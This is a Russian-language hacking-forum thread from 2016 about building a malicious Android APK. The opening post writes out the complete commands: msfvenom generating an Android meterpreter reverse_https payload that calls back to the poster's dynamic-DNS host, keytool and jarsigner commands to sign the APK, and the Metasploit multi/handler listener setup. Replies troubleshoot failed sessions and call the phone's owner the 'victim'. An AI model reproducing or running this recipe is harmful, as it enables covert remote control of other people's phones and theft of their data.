HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Инструменты
Перезагрузить страницу Взлом android: msfvenom -p android/...
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.10.2016, 17:50
veterok
Новичок
Регистрация: 27.09.2016
Сообщений: 0
С нами: 5065925

Репутация: 0
По умолчанию
Основу взял тут.
Предварительно пробросил 443 порт на роутере.
Создал АРК

Код:


Код:
msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk
Затем создал подпись

Код:


Код:
keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Подписал APK

Код:


Код:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /keys/release-key.keystore example.apk alias_name
Кинул АРК на телефон (пробовал на android 5.1 и android 4.2 результат одинаков). Все запустилось.

В терминале как обычно

Код:


Код:
msfconsole
...
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.3
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
эксплоит стартует, но постояно пишет

Код:


Код:
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
...
Sending stage (957999 bytes) to 192.168.1.2
Соединение так и не произошло!!

Аналогичные действия провожу в Armitage 1.4.11
И, мазаль тов!!!

Код:


Код:
meterpreter>
Но через пары команд жертва перестает реагировать.

В общем хочется разобраться в двух вопросах:
1. Почему в терминале не открылась сессия?
2. Почему через 10-15 мин. отваливается конект в Эрмитаже?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 24.10.2016, 02:40
Aldo
Новичок
Регистрация: 16.08.2016
Сообщений: 0
С нами: 5126306

Репутация: 0
По умолчанию
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
 
Ответить с цитированием

  #3  
Старый 24.10.2016, 04:13
z3RoTooL
Новичок
Регистрация: 29.02.2016
Сообщений: 0
С нами: 5370865

Репутация: 0
По умолчанию
Цитата:

Aldo сказал(а):

Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?

может потому что виртуалку надо ставить в общую сеть, а не через NAT ?
 
Ответить с цитированием

  #4  
Старый 24.10.2016, 15:44
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию
Сначала все нужно тестить на себе или эмуляторе,что бы наглядно видеть что происходить на стороне жертвы.Причин может быть много.Одна из - DroidWall ( или какой то фаерволл для андроида,обычно его ставят для блокировки рекламы на рутированых устройствах,хотя если речь идёт о рядомом юзере то эта версия отпадает)
Могу по желанию написать статью с рабочим методом через сборку из исходников.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...